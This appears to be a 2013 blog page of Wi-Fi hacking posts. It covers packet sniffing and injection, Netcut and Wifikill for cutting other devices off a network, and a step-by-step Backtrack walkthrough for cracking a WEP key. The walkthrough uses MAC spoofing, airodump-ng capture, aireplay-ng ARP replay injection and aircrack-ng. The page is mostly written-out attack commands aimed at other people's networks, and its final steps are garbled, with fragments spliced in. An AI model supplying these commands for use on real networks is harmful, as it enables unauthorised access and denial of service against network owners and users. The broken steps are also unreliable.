Showing posts with label Wireless Network Hacking. Show all posts
Showing posts with label Wireless Network Hacking. Show all posts

Saturday, December 7, 2013

Packet sniffing (Wireshark) and injecting (Wireless)

Uses :

-Disrupting certain services (file sharing or HTTP) by internet service providers and wireless access points
-Compromising wireless access points and circumventing their security
-Exploiting certain functionality in online games
-Determining the presence of internet censorship
-Allows for custom packet designers to test their custom packets by directly placing them onto a computer network
-Simulation of specific network traffic and scenarios
-Testing of network firewalls and intrusion detection systems
-Computer network auditing and troubleshooting computer network related issues
-Man in the middle attack

Requirements :

Backtrack
Wireshark
MAC address of your wireless access point
Your wireless access point channel

SEQUENCE 1. - Sniffing

Part 1. - Sniffing packets via Wireshark

1.Open up Wireshark.
2.Click on Interface List.Captureable packets will begin to list.
3.To sniff listed packets,just click Start button.

Part 2. - Sniffing packets (WEP encrypted) via Backtrack

1.Open up terminal.
2.Type in:

Quote:airodump-ng --bssid your_wireless_MAC_address mon0

3.Wait till airodump-ng is finished.
4.After it has finished,you should see the number of your channel under CH label.
5.Now we need to target our access point so it show only packets from our access point,using this command:

Quote:iwconfig mon0 channel channel_here

Now let's see packets coming from our access point over Wireshark!

6.Go to Wireshark window.
7.Type this in filter box:

(wlan.bssid == your_MAC_address_here) && (wlan.fc.type_subtype == 0?20)

8.You can see packets coming from our access point only!

SEQUENCE 2. - Injecting

Part 1. - Injecting via Wireshark and Backtrack

1.Go to Wireshark window.
2.Type this in filter box:

Quote:bssid == your_MAC_address_here) && !(wlan.fc.type_subtype == 0?08)

3.Finally,go to Backtrack window and type.

Quote:aireplay-ng -9 -e "your_SSID_here" -a your_MAC_address_here mon0

Saturday, November 30, 2013

WEP and WPA-PSK wifi cracking tool

Aircrack-ng (a fork of aircrack) is my main tool for cracking Wi-Fi passwords. It has a wireless network detector, a packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

Friday, November 29, 2013

How to disconnect any wifi devices from network


Netcut is mostly used to disconnect any wifi device from network and Find any IP/Computer/network devices/Phone/Xbox/PSP/PS3/Wii/Ipad anything using netcut tool.
The driver and Install package has been upgrade. tested working under windows 7 both 32 bit and 64 bit OS. Its change MAC address on any adapter, including wireless. Details at How to change MAC. Also support Clone MAC address from any PC that NetCut monitored. 
Whereas Wifikill use for Android applications to disable internet connections for a device on same network. Disconnect wifi connection and get full network on your device.


Wifi hacking Using Backtrack

Step 1:-
First Download Backtrack  from the following link:
Step 2:-
Burn the iso image on CD and boot your laptop from CD drive
Step 3:-
Select the third boot option(VESA/KDE).
Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a 
 "Konsole" window.
Step 5:-
Type the following command
airmon-ng
Note down the interface name. In this example wifi0
Step 6:-
airmon-ng stop wifi0
Step 7:-
ifconfig wifi0 down
Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0
Step 9:-
airmon-ng start wifi0
Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier. 
If not than don?t worry we will still crack it.
Step 11:-
airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole
Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don?t get Association Successful mesage then keep on trying until
you got success.
Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don?t see ARP ACK and sent packets are not increasing or still 0 
than it means no 1 is
accessing that network.But don?t worry you go an optional step,
Leave this console as it is and start new k
Step 14:-
aireplay-ng -2 ?p 0841 ?c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
konsole
?b (bssid) ?h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.
Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch?..Backtrack will do rest of the work.
Hurray we got the key.